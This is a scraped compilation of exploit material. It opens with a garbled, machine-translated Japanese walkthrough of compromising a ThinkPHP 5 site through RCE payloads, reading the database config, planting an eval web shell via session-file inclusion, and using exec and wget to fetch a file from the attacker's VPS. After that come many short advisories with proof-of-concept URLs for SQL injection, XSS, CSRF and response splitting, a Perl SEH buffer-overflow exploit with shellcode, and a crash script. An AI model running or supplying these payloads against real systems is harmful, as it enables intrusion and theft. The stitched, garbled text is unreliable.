HireHackking

0x00はじめに 以前にTP5と接触していたサイトが少なかったので、RCEの脆弱性のゲッシェルを使用する方法しか知っていませんでした。 PHPバージョンの制限により、カード発行プラットフォームの最近の普及では、RCEのペイロードを使用してシェルを直接取得することは不可能です。そのため、Webサイトと組み合わせて、TP5+PHP7.1環境でできるだけ多くのGetShellメソッドをテストします。 0x02テキスト サイトを入手したら、次のようにホームページにアクセスしてください テスト中、それがThinkPHPサイトであることがわかりました、そして、エラーは次のようにのように報告されました しかし、特定のバージョンが表示されないので、RCEがあるかどうかはわかりませんので、EXPで試してみます _method=__ constructmethod=getFilter=call_user_funcget []=phpinfo 実行が成功し、disable_function によって多くの機能が無効になっていることがわかりました 一般に、PHPバージョンが7.1未満の場合は、EXPを使用してシェルを書き込むだけです。この方法は、次のExpを直接使用してシェルを書き込むことです。 s=file_put_contents（ 'test.php'、 '？php phpinfo（）;'）_ method=__ constructmethod=postfilter []=assert ただし、ASSTはこのEXPで使用されており、上記はPHPバージョンが7.1.33であることを示しています。このバージョンはアサートを使用できなくなるため、この方法はここでは使用できません。 上記の方法2はシェルを書き込むことはできませんが、phpinfoは実行されるため、RCEが存在します。そこで、ファイルを読んでデータベースアカウントのパスワードを読み取り、phpmyAdminを見つけてから、データベースを介してシェルを書き込むことができると思いました。 最初にPHPINFOの情報を介してWebサイトルートディレクトリを見つけ、次にScandir関数を使用してディレクトリをトラバースし、データベース構成ファイルを見つけます _method=__ constructfilter []=scandirfilter []=var_dumpmethod=getGet []=path 次に、highlight_file関数を介してファイルを読み取ります _method=__ constructfilter []=highlight_filemethod=getGet []=ファイルパスを読み取ります データベース情報を取得した後、私はphpmyadminが存在するかどうかを探しましたが、最終的にそうではないことがわかりました。そのため、この方法も失敗しました。 フォーラムでTP5のゲッシェル法を探して、多くのマスターは、ログやセッションを使用してメソッドを含めることができると言っていましたが、以前にそれらにさらされたことがなく、特定のものを知らなかったので、私はそれを検索して試しました。 方法3試行ログには含まれます 最初にシェルを書き、ログを入力します _method=__ constructmethod=getFilter []=call_user_funcserver []=phpinfoget []=？php eval（$ _ post ['c']）？ 次に、ログ包含によって逃げます _method=__ constructMethod=getFilter []=Think \ __ include_fileserver []=phpinfoget []=./data/runtime/log/202110/17.logc=phpinfo（）; 失敗し、ログに含まれる方法は使用できません。 方法4セッションに含まれるメソッドを使用して、ゲルシェルを試してみてください まず、セッションセッションを設定し、テンテンテントロイの木馬に渡す _method=__ constructfilter []=think \ session3:setmethod=getGet []=？PHP eval（$ _ post ['c']）？server []=1 次に、ファイルを直接使用してセッションファイルを含めます。 TP5のセッションファイルは通常/TMP未満で、ファイル名はSESSION_SESSIONIDです（このセッションはCookieにあります） _method=__ constructMethod=getFilter []=Think \ __ include_fileserver []=phpinfoget []=/tmp/sess_ejc3iali7uv3deo9g6ha8pbtoic=phpinfo（）; 正常に実行され、Ant Sword を介して接続します 成功GETSHELL WWW許可 メソッド5にシェルを手に入れましたが、逃げることができる他の方法があるかどうかをもう一度試しました。 execがdisable_functionで無効になっていないため、記事を見ました。その後、execを使用してVPSからシェルファイルをダウンロードしました。 そこで、disable_functionの無効な機能を注意深く調べました。偶然、私は幹部も無効になっていないことがわかったので、私はそれを試してみます 最初にVPSでtest.phpを作成し、pythonでポートを開きます python -m simplehttpserver 8888 VPSからファイルをダウンロードします s=wget vps/test.php_method=__ constructmethod=getFilter []=exec ターゲットマシンに正常にダウンロードされました 0x03要約 1。ターゲットWebサイトパスに間違ったパスを入力すると、WebサイトのエラーページがThinkPhpであり、バージョンは表示されません。 2. TP5.xのRCE POCを入力して、PHPINFOが成功し、Disabled_Functionが多くの関数を無効にし、PHPバージョンは7.1.xバージョンであることを示します http://www.xxx.com/index.php?s=captcha Post: _method=__ constructmethod=getFilter=call_user_funcget []=phpinfo 3.次の方法では、シェルを直接取得できます（TP5.x+PHP7.1.x） 方法1 ：（ PHP要件はPHP7.1よりも低い） http://www.xxx.com/index.php?s=captcha Post: s=file_put_contents（ 'test.php'、 '？php phpinfo（）;'）_ method=__ constructmethod=postfilter []=assert（ 方法2：（TP5.x+php7.1.x） まず、PHPINFOの情報を介してWebサイトルートディレクトリを見つけてから、Scandir関数を使用してディレクトリをトラバースし、データベース構成ファイルを見つけます _method=__ constructmethod=getfilter=call_user_funcget []=phpinfo //ウェブサイトディレクトリは/www/wwwroot/idj/、およびディレクトリトラバーサルをWebサイト構成ルートディレクトリ（/www/wwwroot/wwwroot/conf）から取得します。 _method=__ constructfilter []=scandirfilter []=var_dumpmethod=getget []=/www/wwwroot/ _method=__ constructfilter []=scandirfilter []=var_dumpmethod=getget []=/www/wwwroot/idj/ _method=__ constructfilter []=scandirfilter []=var_dumpmethod=getGet []=/www/wwwroot/idj/data/ _method=__ constructfilter []=scandirfilter []=var_dumpmethod=getGet []=/www/wwwroot/idj/data/conf 次に、highlight_file関数を介してファイルを読み取り、データベースの接続ユーザー名とパスワードを読み取ります _method=__ constructfilter []=highlight_filemethod=getGet []=/www/wwwroot/data/data/conf/database.php ウェブサイトにphpmyAdminがあることがわかった場合は、データベースユーザーとパスワードを介して入力して、mysqlログを介してシェルに書き込むことができます 方法3：（TP5.x+php7.1.x、ログには含まれています） 最初にシェルを書き、ログを入力します _method=__ constructmethod=getFilter []=call_user_funcserver []=phpinfoget []=？php eval（$ _ post ['c']）？ 次に、ログ包含によって逃げます _method=__ constructMethod=getFilter []=Think \ __ include_fileserver []=phpinfoget []=./data/runtime/log/202110/17.logc=phpinfo（）; 方法4：（TP5.x + php7.1.x、セッションに含まれる方法を使用してください。 まず、セッションセッションを設定し、テンテンテントロイの木馬に渡す _method=__ constructfilter []=think \ session3:setmethod=getGet []=？PHP eval（$ _ post ['c']）？server []=1 次に、ファイルを直接使用してセッションファイルを含めます。 TP5のセッションファイルは通常/TMP未満で、ファイル名はSESSION_SESSIONIDです（このセッションはCookieにあります） _method=__ constructMethod=getFilter []=Think \ __ include_fileserver []=phpinfoget []=/tmp/sess_ejc3iali7uv3deo9g6ha8pbtoic=phpinfo（）; 方法4：（TP5.X+PHP7.1.x、無効なexec関数はdisable_functionで使用されません） 最初にVPSでtest.phpを作成し、pythonでポートを開きます python -m simplehttpserver 8888 VPSからファイルをダウンロードします s=wget http://www.vps.com/test.php_method=__constructmethod=getfilter []=exec オリジナルリンク：https://xz.aliyun.com/t/10397

source: https://www.securityfocus.com/bid/58857/info Google Chrome is prone to a denial-of-service vulnerability because it fails to verify the user supplied input. Successfully exploiting this issue will allow an attacker to inject special characters into the browser's local cookie storage, resulting in the requested website always responding with an error message which is hosted on specific web server software (like lighttpd). This will cause a denial-of-service condition. Chromium 25.0.1364.160 is vulnerable; other versions may also be affected. Note: The content related to Mozilla Firefox Browser has been moved to BID 62969 (Mozilla Firefox Browser Cookie Verification Denial of Service Vulnerability) for better documentation. http://www.example.com/?utm_source=test&utm_medium=test&utm_campaign=te%05st

source: https://www.securityfocus.com/bid/58897/info Apache Subversion is prone to a remote denial-of-service vulnerability. Attackers can exploit this issue to crash the application, resulting in denial-of-service conditions. Apache Subversion versions 1.6.0 through 1.6.20 and 1.7.0 through 1.7.8 are vulnerable. curl -X LOCK --data-binary @lock_body 'http://www.example.com/repo/foo'

source: https://www.securityfocus.com/bid/58898/info Apache Subversion is prone to a remote denial-of-service vulnerability. Attackers can exploit this issue to crash the application, resulting in denial-of-service conditions. Apache Subversion versions 1.7.0 through 1.7.8 are vulnerable. curl -X REPORT --data-binary @log_report 'http://www.example.com/repo/!svn/bc/1/'

#******************************************************************************************************************************************** # # Exploit Title: VeryPDF Image2PDF Converter SEH Buffer Overflow # Date: 10-7-2015 # Software Link: http://www.verypdf.com/tif2pdf/img2pdf.exe # Exploit Author: Robbie Corley # Platform Tested: Windows 7 x64 # Contact: c0d3rc0rl3y@gmail.com # Website: # CVE: # Category: Local Exploit # # Description: # The title parameter contained within the c:\windows\Image2PDF.INI is vulnerable to a buffer overflow. # This can be exploited using SEH overwrite. # # Instructions: # 1. Run this sploit as-is. This will generate the new .ini file and place it in c:\windows, overwriting the existing file # 2. Run the Image2PDF program, hit [try], file --> add files # 3. Open any .tif file. Here's the location of one that comes with the installation: C:\Program Files (x86)\VeryPDF Image2PDF v3.2\trial.tif # 4. Hit 'Make PDF', type in anything for the name of the pdf-to-be, and be greeted with your executed shellcode ;) #********************************************************************************************************************************************** #standard messagebox shellcode. $shellcode = "\x31\xd2\xb2\x30\x64\x8b\x12\x8b\x52\x0c\x8b\x52\x1c\x8b\x42". "\x08\x8b\x72\x20\x8b\x12\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03". "\x78\x3c\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x31\xed\x8b". "\x34\xaf\x01\xc6\x45\x81\x3e\x46\x61\x74\x61\x75\xf2\x81\x7e". "\x08\x45\x78\x69\x74\x75\xe9\x8b\x7a\x24\x01\xc7\x66\x8b\x2c". "\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf\xfc\x01\xc7\x68\x79\x74". "\x65\x01\x68\x6b\x65\x6e\x42\x68\x20\x42\x72\x6f\x89\xe1\xfe". "\x49\x0b\x31\xc0\x51\x50\xff\xd7"; $padding="\x90" x 2985; $seh=pack('V',0x6E4B3045); #STANDARD POP POP RET $morepadding="\x90" x 1096; open(myfile,'>c:\\windows\\Image2PDF.INI'); #generate the dummy DWF file #.ini file header & shellcode print myfile "[SaveMode] m_iMakePDFMode=0 m_iSaveMode=0 m_szFilenameORPath= m_iDestinationMode=0 m_bAscFilename=0 m_strFileNumber=0001 [BaseSettingDlg] m_bCheckDespeckle=0 m_bCheckSkewCorrect=0 m_bCheckView=0 m_szDPI=default m_bCheckBWImage=1 [SetPDFInfo] m_szAuthor= m_szSubject= m_szTitle=".$padding."\xEB\x06\x90\x90".$seh.$shellcode.$morepadding; close (myfile); #close the file

Kallithea 0.2.9 (came_from) HTTP Response Splitting Vulnerability Vendor: Kallithea Product web page: https://www.kallithea-scm.org Version affected: 0.2.9 and 0.2.2 Summary: Kallithea, a member project of Software Freedom Conservancy, is a GPLv3'd, Free Software source code management system that supports two leading version control systems, Mercurial and Git, and has a web interface that is easy to use for users and admins. Desc: Kallithea suffers from a HTTP header injection (response splitting) vulnerability because it fails to properly sanitize user input before using it as an HTTP header value via the GET 'came_from' parameter in the login instance. This type of attack not only allows a malicious user to control the remaining headers and body of the response the application intends to send, but also allow them to create additional responses entirely under their control. Tested on: Kali Python Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2015-5267 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5267.php Vendor: https://kallithea-scm.org/news/release-0.3.html Vendor Advisory: https://kallithea-scm.org/security/cve-2015-5285.html CVE ID: 2015-5285 CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5285 21.09.2015 -- GET /_admin/login?came_from=d47b5%0d%0aX-Forwarded-Host%3a%20http://zeroscience.mk%01%02%0d%0aLocation%3a%20http://zeroscience.mk HTTP/1.1 Host: 192.168.0.28:8080 Content-Length: 0 Cache-Control: max-age=0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Origin: http://192.168.0.28:8080 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.93 Safari/537.36 Content-Type: application/x-www-form-urlencoded Referer: http://192.168.0.28:8080/_admin/login?came_from=%2F Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.8 Cookie: kallithea=3090b35b3e37ba350d71b62c240c50bf87932f0d7e6b1a600cba4e0e890b7e29e253b438 ### HTTP/1.1 302 Found Cache-Control: no-cache Content-Length: 411 Content-Type: text/html; charset=UTF-8 Date: Mon, 21 Sep 2015 13:58:05 GMT Location: http://192.168.0.28:8080/_admin/d47b5 X-Forwarded-Host: http://zeroscience.mk Location: http://zeroscience.mk Pragma: no-cache Server: waitress <html> <head> <title>302 Found</title> </head> <body> <h1>302 Found</h1> The resource was found at <a href="http://192.168.0.28:8080/_admin/d47b5 X-Forwarded-Host: http://zeroscience.mk Location: http://zeroscience.mk">http://192.168.0.28:8080/_admin/d47b5 X-Forwarded-Host: http://zeroscience.mk Location: http://zeroscience.mk</a>; you should be redirected automatically. </body> </html>

source: https://www.securityfocus.com/bid/58911/info PHP Address Book is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input. A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. PHP Address Book 8.2.5 is vulnerable; other versions may also be affected. http://www.example.com/addressbook/register/edit_user.php?id={insert}

source: https://www.securityfocus.com/bid/58911/info PHP Address Book is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input. A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. PHP Address Book 8.2.5 is vulnerable; other versions may also be affected. http://www.example.com/addressbook/register/delete_user.php?id={insert}

source: https://www.securityfocus.com/bid/58911/info PHP Address Book is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input. A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. PHP Address Book 8.2.5 is vulnerable; other versions may also be affected. http://www.example.com/addressbook/register/edit_user_save.php?id={insert}&lastname={insert}&firstname={insert}&phone={insert}&email={insert}&permissions={insert}&notes={insert}

source: https://www.securityfocus.com/bid/58911/info PHP Address Book is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input. A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. PHP Address Book 8.2.5 is vulnerable; other versions may also be affected. http://www.example.com/addressbook/register/reset_password.php?email={insert}&password={insert}

source: https://www.securityfocus.com/bid/58911/info PHP Address Book is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input. A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. PHP Address Book 8.2.5 is vulnerable; other versions may also be affected. http://www.example.com/addressbook/register/linktick.php?site={insert}

source: https://www.securityfocus.com/bid/58911/info PHP Address Book is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input. A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. PHP Address Book 8.2.5 is vulnerable; other versions may also be affected. http://www.example.com/addressbook/register/reset_password_save.php?username={insert}&password=&password_confirm=&password_hint={insert}&email={insert}

source: https://www.securityfocus.com/bid/58911/info PHP Address Book is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input. A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. PHP Address Book 8.2.5 is vulnerable; other versions may also be affected. http://www.example.com/addressbook/register/router.php COOKIE var BasicLogin

source: https://www.securityfocus.com/bid/58911/info PHP Address Book is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input. A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. PHP Address Book 8.2.5 is vulnerable; other versions may also be affected. http://www.example.com/addressbook/register/traffic.php?var={insert}

source: https://www.securityfocus.com/bid/58911/info PHP Address Book is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input. A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. PHP Address Book 8.2.5 is vulnerable; other versions may also be affected. http://www.example.com/addressbook/register/user_add_save.php POST var email

source: https://www.securityfocus.com/bid/58911/info PHP Address Book is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input. A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. PHP Address Book 8.2.5 is vulnerable; other versions may also be affected. http://www.example.com/addressbook/register/checklogin.php?username={insert}&password=pass

source: https://www.securityfocus.com/bid/58911/info PHP Address Book is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input. A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. PHP Address Book 8.2.5 is vulnerable; other versions may also be affected. http://www.example.com/addressbook/register/admin_index.php?q={insert}

source: https://www.securityfocus.com/bid/58913/info Zimbra is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. http://www.example.com/aspell.php?disctionnary=&gt;<script>alert('foo');</script>

source: https://www.securityfocus.com/bid/58943/info Multiple Foscam IP Cameras are prone to multiple cross-site request-forgery vulnerabilities. Exploiting these issues may allow a remote attacker to perform certain unauthorized actions. This may lead to further attacks. The following products are vulnerable: Foscam FI8910W running Embedded Web Interface 2.4.10.3 Foscam FI8908W running Embedded Web Interface 2.4.10.3 http://www.example.com/set_users.cgi?user1=&pwd1=&pri1=2&user2=&pwd2=&pri2=&user3=&pwd3=&pri3=&user4=&pwd4=&pri4=&user5=&pwd5=&pri5=&user6=&pwd6=&pri6=&user7=&pwd7=&pri7=&user8=csrf&pwd8=csrf&pri8=2&next_url=

source: https://www.securityfocus.com/bid/58945/info EasyPHP is prone to an authentication bypass and a PHP code execution vulnerability. Attackers may exploit these issues to gain unauthorized access to the affected application and perform arbitrary actions or execute arbitrary PHP code within the context of the web server process. Successful attacks can compromise the affected application and possibly the underlying computer. EasyPHP 12.1 is vulnerable; other versions may also be affected. http://www.example.com/home/index.php?to=ext http://www.example.com/home/index.php?to=phpinfo

source: https://www.securityfocus.com/bid/58948/info The Traffic Analyzer plugin for WordPress is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. http://www.example.com/wp-content/plugins/trafficanalyzer/js/ta_loaded.js.php?aoid=[Xss]

source: https://www.securityfocus.com/bid/58962/info phpMyAdmin is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. phpMyAdmin 3.5.0 through versions 3.5.7 are vulnerable. http://www.example.com/PMA/tbl_gis_visualization.php?db=information_schema&token=17961b7ab247b6d2b39d730bf336cebb&visualizationSettings[width]="><script>alert(123);</script> http://www.example.com/PMA/tbl_gis_visualization.php?db=information_schema&token=17961b7ab247b6d2b39d730bf336cebb&visualizationSettings[height]="><script>alert(123);</script>

source: https://www.securityfocus.com/bid/58976/info Spiffy XSPF Player plug-in for WordPress is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. Spiffy XSPF Player 0.1 is vulnerable; other versions may also be affected. http://www.example.com/wp-content/plugins/spiffy/playlist.php?playlist_id=[SQL]

Hello, I want to report following exploit: # Exploit Title: PHPMyLicense Stored Cross Site Scripting # Date: 09-10-2015 # Exploit Author: Aria Akhavan Rezayat @ Websec GesmbH # Website: https://websec-test.com # Vendor Homepage: https://phpmylicense.com # Software Link: http://codecanyon.net/item/phpmylicense/11719122 # Version: 3.0.0 - 3.1.4 (REQUIRED) # Category: Webapps 1.) Description: Any registered user can simply disable functionality of the whole application and input malicious code because of a lack of filtering. 2.) Proof of Concept: localhost/phpmylicense/ajax/ POST: comments=bla-->MaliciousCode<%21--&customer_email=bla&domain=bla&expirydate=26-10-2014&handler=newlicense&parameters=bla&productid=20&serialkey=bla&status=processing 3.) Solution: None. - No Update available for it.

#!/usr/bin/python # Exploit Title: Tomabo MP4 Converter 3.10.12 - (.m3u) Denial of service (Crush application) # Date: [8-10-2015] # Exploit Author: [M.Ibrahim] vulnbug@gmail.com # E-Mail: vulnbug <at> gmail.com # Vendor Homepage: http://www.tomabo.com/mp4-converter/index.html # Version: [3.10.12] # Tested on: windows 7 x86 junk="A"*600000 file = "exploit.m3u" f=open(file,"w") f.write(junk); f.close();